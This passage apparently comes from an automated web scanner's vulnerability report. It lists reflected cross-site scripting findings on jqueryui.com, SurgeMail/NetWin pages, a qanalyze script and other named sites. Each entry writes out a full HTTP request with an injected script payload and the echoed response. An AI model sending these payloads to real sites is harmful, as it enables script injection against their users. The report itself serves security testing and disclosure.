0d188&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ror=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=209d5c2<script>alert(1)</script>c3400b0d188&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma,
...[SNIP]...

1.239. http://jqueryui.com/themeroller/css/parseTheme.css.php [thicknessShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the thicknessShadow request parameter is copied into the HTML document as plain text between tags. The payload 2961c<script>alert(1)</script>86a3d63a4a7 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px2961c<script>alert(1)</script>86a3d63a4a7&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
erlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px2961c<script>alert(1)</script>86a3d63a4a7&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma, Verdana, Arial, sans
...[SNIP]...

1.240. http://jqueryui.com/themeroller/css/parseTheme.css.php [tr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 22a31<script>alert(1)</script>5d4a7e54332 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr=ffDefault=Helvetica,Arial,sans-serif22a31<script>alert(1)</script>5d4a7e54332&fwDefault=normal&fsDefault=1.1em&cornerRadius=6px&bgColorHeader=cb842e&bgTextureHeader=02_glass.png&bgImgOpacityHeader=25&borderColorHeader=d49768&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=f4f0ec&bgTextureContent=05_inset_soft.png&bgImgOpacityContent=100&borderColorContent=e0cfc2&fcContent=1e1b1d&iconColorContent=c47a23&bgColorDefault=ede4d4&bgTextureDefault=02_glass.png&bgImgOpacityDefault=70&borderColorDefault=cdc3b7&fcDefault=3f3731&iconColorDefault=f08000&bgColorHover=f5f0e5&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=f5ad66&fcHover=a46313&iconColorHover=f08000&bgColorActive=f4f0ec&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=100&borderColorActive=e0cfc2&fcActive=b85700&iconColorActive=f35f07&bgColorHighlight=f5f5b5&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=75&borderColorHighlight=d9bb73&fcHighlight=060200&iconColorHighlight=cb672b&bgColorError=fee4bd&bgTextureError=04_highlight_hard.png&bgImgOpacityError=65&borderColorError=f8893f&fcError=592003&iconColorError=ff7519&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=75&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=75&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17967

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr=ffDefault=Helvetica,Arial,sans-serif22a31<script>alert(1)</script>5d4a7e54332&fwDefault=normal&fsDefault=1.1em&cornerRadius=6px&bgColorHeader=cb842e&bgTextureHeader=02_glass.png&bgImgOpacityHeader=25&borderColorHeader=d49768&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent
...[SNIP]...

1.241. http://jqueryui.com/themeroller/css/parseTheme.css.php [tr&ffDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the tr&ffDefault request parameter is copied into the HTML document as plain text between tags. The payload c416e<script>alert(1)</script>8e010dd02bb was submitted in the tr&ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serifc416e<script>alert(1)</script>8e010dd02bb&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:13 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serifc416e<script>alert(1)</script>8e010dd02bb&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ff
...[SNIP]...

1.242. http://netwinsite.com/cgi-bin/keycgi.exe [product parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://netwinsite.com
Path:	/cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the HTML document as plain text between tags. The payload 2d4eb<script>alert(1)</script>700011dbac7 was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=download&product=surgemail2d4eb<script>alert(1)</script>700011dbac7& HTTP/1.1
Host: netwinsite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:29 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<b>'surgemail2d4eb<script>alert(1)</script>700011dbac7'</b>
...[SNIP]...

1.243. http://netwinsite.com/cgi-bin/keycgi.exe [product parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://netwinsite.com
Path:	/cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c373f"><script>alert(1)</script>b1252f723a1 was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=download&product=surgemailc373f"><script>alert(1)</script>b1252f723a1& HTTP/1.1
Host: netwinsite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:27 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<input type="hidden" name="product" value="surgemailc373f"><script>alert(1)</script>b1252f723a1">
...[SNIP]...

1.244. https://netwinsite.com/cgi-bin/keycgi.exe [product parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://netwinsite.com
Path:	/cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the HTML document as plain text between tags. The payload d21cc<script>alert(1)</script>a7e6f514dd4 was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=buy_new&product=surgemaild21cc<script>alert(1)</script>a7e6f514dd4 HTTP/1.1
Host: netwinsite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:32 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<font face="Arial, Helvetica, sans-serif" size="4">Unable to find productid for (surgemaild21cc<script>alert(1)</script>a7e6f514dd4)
</font>
...[SNIP]...

1.245. http://news.netwinsite.com:8119/webnews [group parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://news.netwinsite.com:8119
Path:	/webnews

Issue detail

The value of the group request parameter is copied into the HTML document as plain text between tags. The payload ab3ba<script>alert(1)</script>8494d9617b4 was submitted in the group parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webnews?group=netwin.surgemailab3ba<script>alert(1)</script>8494d9617b4&cmd=list HTTP/1.1
Host: news.netwinsite.com:8119
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: DManager
MIME-version: 1.0
WWW-Authenticate: Basic realm="surgenews.netwin.netwinsite.com"
Date: Tue, 16 Nov 2010 00:19:31 GMT
Content-type: text/html
Set-Cookie: webnews=4b2be152_cookie; expires=Tue, 24-May-2011 19:19:31 GMT


<html>

<head>
<title>Listing of netwin.surgemailab3ba<script>alert(1)</script>8494d9617b4</title>


<LINK REL = "stylesheet" TYPE = "text/css"
...[SNIP]...
<b>411 no such newsgroup (netwin.surgemailab3ba<script>alert(1)</script>8494d9617b4)</b>
...[SNIP]...

1.246. http://news.netwinsite.com:8119/webnews [group parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://news.netwinsite.com:8119
Path:	/webnews

Issue detail

The value of the group request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b57d"><script>alert(1)</script>d1d4c945d27 was submitted in the group parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webnews?group=netwin.surgemail6b57d"><script>alert(1)</script>d1d4c945d27&cmd=list HTTP/1.1
Host: news.netwinsite.com:8119
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: DManager
MIME-version: 1.0
WWW-Authenticate: Basic realm="surgenews.netwin.netwinsite.com"
Date: Tue, 16 Nov 2010 00:19:31 GMT
Content-type: text/html
Set-Cookie: webnews=4b2be152_cookie; expires=Tue, 24-May-2011 19:19:31 GMT


<html>

<head>
<title>Listing of netwin.surgemail6b57d"><script>alert(1)</script>d1d4c945d27</title>


<LINK REL = "stylesheet" TYPE = "text/css
...[SNIP]...
<a class="hrefbutton" href="/webnews?cmd=unsub&group=netwin.surgemail6b57d"><script>alert(1)</script>d1d4c945d27&sid=653664256">
...[SNIP]...

1.247. http://news.netwinsite.com:8119/webnews [group parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://news.netwinsite.com:8119
Path:	/webnews

Issue detail

The value of the group request parameter is copied into the HTML document as text between TITLE tags. The payload 255e7</title><script>alert(1)</script>cf6af4a657 was submitted in the group parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webnews?group=netwin.surgemail255e7</title><script>alert(1)</script>cf6af4a657&cmd=list HTTP/1.1
Host: news.netwinsite.com:8119
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: DManager
MIME-version: 1.0
WWW-Authenticate: Basic realm="surgenews.netwin.netwinsite.com"
Date: Tue, 16 Nov 2010 00:19:31 GMT
Content-type: text/html
Set-Cookie: webnews=4b2be152_cookie; expires=Tue, 24-May-2011 19:19:31 GMT


<html>

<head>
<title>Listing of netwin.surgemail255e7</title><script>alert(1)</script>cf6af4a657</title>


<LINK REL = "stylesheet" TYPE = "tex
...[SNIP]...

1.248. http://st247.qanalyze.com/qanalyze_js.php [idSite parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://st247.qanalyze.com
Path:	/qanalyze_js.php

Issue detail

The value of the idSite request parameter is copied into a JavaScript rest-of-line comment. The payload e5e0d%0aalert(1)//cc15b1eab6a was submitted in the idSite parameter. This input was echoed as e5e0d
alert(1)//cc15b1eab6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /qanalyze_js.php?refElement=top-part&idSite=2e5e0d%0aalert(1)//cc15b1eab6a HTTP/1.1
Host: st247.qanalyze.com
Proxy-Connection: keep-alive
Referer: http://www.icewarp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:14 GMT
Server: Apache/2.2.6 (Win32) mod_ssl/2.2.6 OpenSSL/0.9.8e mod_wsgi/2.4-BRANCH Python/2.6.1 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Type: application/javascript
Content-Length: 122082

var QStats,qStats_log,qStats_track;if(!this.QStats){QStats=(function(){var c,i={},e=document,d=navigator,g=screen,l=window,f=false,n=[];function m(p){return typeof p!=="undefined"}function h(p,r,q,s)
...[SNIP]...
otkeys - end
*/

jQuery.noConflict();var heatmapSettingsRefId='top-part';var heatmapSettingsServiceUrl='http://st247.qanalyze.com';var heatmapSettingsUrlSite=location.href;var heatmapSettingsIdSite=2e5e0d
alert(1)//cc15b1eab6a;var refObject;
function setRefObject(id){if(document.getElementById(id)){refObject=document.getElementById(id)}else{refObject=document.getElementsByTagName('body')}}var swfHeatmapShow=false;var resizi
...[SNIP]...

1.249. http://st247.qanalyze.com/qanalyze_js.php [refElement parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://st247.qanalyze.com
Path:	/qanalyze_js.php

Issue detail

The value of the refElement request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fe9a3%3balert(1)//86ef6e8bda0 was submitted in the refElement parameter. This input was echoed as fe9a3;alert(1)//86ef6e8bda0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /qanalyze_js.php?refElement=top-partfe9a3%3balert(1)//86ef6e8bda0&idSite=2 HTTP/1.1
Host: st247.qanalyze.com
Proxy-Connection: keep-alive
Referer: http://www.icewarp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:10 GMT
Server: Apache/2.2.6 (Win32) mod_ssl/2.2.6 OpenSSL/0.9.8e mod_wsgi/2.4-BRANCH Python/2.6.1 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Type: application/javascript
Content-Length: 122109

var QStats,qStats_log,qStats_track;if(!this.QStats){QStats=(function(){var c,i={},e=document,d=navigator,g=screen,l=window,f=false,n=[];function m(p){return typeof p!=="undefined"}function h(p,r,q,s)
...[SNIP]...
Browser = "";
var qAnalyzeDocument = "";
var qAnalyzeWait = 500;
var qAnalyzeLocalWait = 0;
var qAnalyzeDebug = (window.location.href.search(/debugqanalyze/) !== -1);
var qAnalyzeRefElement = "top-partfe9a3;alert(1)//86ef6e8bda0";

function showQAnalyzeDebug(a){if(qAnalyzeDebug===true){document.getElementById("qAnalyzeDebuggerSpan").innerHTML=a;document.getElementById("qAnalyzeDebuggerDiv").style.display="block"}}
function c
...[SNIP]...

1.250. http://translate-pirate.com/cgi-bin/xlate.cgi [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://translate-pirate.com
Path:	/cgi-bin/xlate.cgi

Issue detail

The value of the page request parameter is copied into the HTML document as plain text between tags. The payload 2bfcf<script>alert(1)</script>8a3f44bef49 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/xlate.cgi?page=netwinsite.com2bfcf<script>alert(1)</script>8a3f44bef49 HTTP/1.1
Host: translate-pirate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:19:42 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 195
Connection: close
Content-Type: text/html

Page to translate is (netwinsite.com2bfcf<script>alert(1)</script>8a3f44bef49)<br>
Download failed (tcp: open (netwinsite.com2bfcf<script>alert(1)<) failed (Err Code Zero gethostbyname failed)
)

1.251. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mathias-bank.de
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 834bc"><script>alert(1)</script>e0de654d2de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 834bc\"><script>alert(1)</script>e0de654d2de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?834bc"><script>alert(1)</script>e0de654d2de=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:48:19 GMT
Server: Apache/2.2.8 (Ubuntu)
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1289868499+174.122.23.218; path=/
Set-Cookie: PHPSESSID=683e938acdaeb9c30dfc559031374042; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="/?834bc\"><script>alert(1)</script>e0de654d2de=1/lang-pref/en/">
...[SNIP]...

1.252. http://www.surgemail.com/cgi-bin/keycgi.exe [product parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.surgemail.com
Path:	/cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feacf"><script>alert(1)</script>aa416f6a094 was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=download&product=surgemailfeacf"><script>alert(1)</script>aa416f6a094& HTTP/1.1
Host: www.surgemail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:49:08 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<input type="hidden" name="product" value="surgemailfeacf"><script>alert(1)</script>aa416f6a094">
...[SNIP]...

1.253. http://www.surgemail.com/cgi-bin/keycgi.exe [product parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.surgemail.com
Path:	/cgi-bin/keycgi.exe

Issue detail

The value of the product request parameter is copied into the HTML document as plain text between tags. The payload 6b713<script>alert(1)</script>ccee403b38e was submitted in the product parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/keycgi.exe?cmd=download&product=surgemail6b713<script>alert(1)</script>ccee403b38e& HTTP/1.1
Host: www.surgemail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 00:49:10 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="/css2/netwin.css">

...[SNIP]...
<b>'surgemail6b713<script>alert(1)</script>ccee403b38e'</b>
...[SNIP]...

1.254. https://accounts.zoho.com/login [iamcsr cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://accounts.zoho.com
Path:	/login

Issue detail

The value of the iamcsr cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9241'-alert(1)-'223bb6c4a58 was submitted in the iamcsr cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

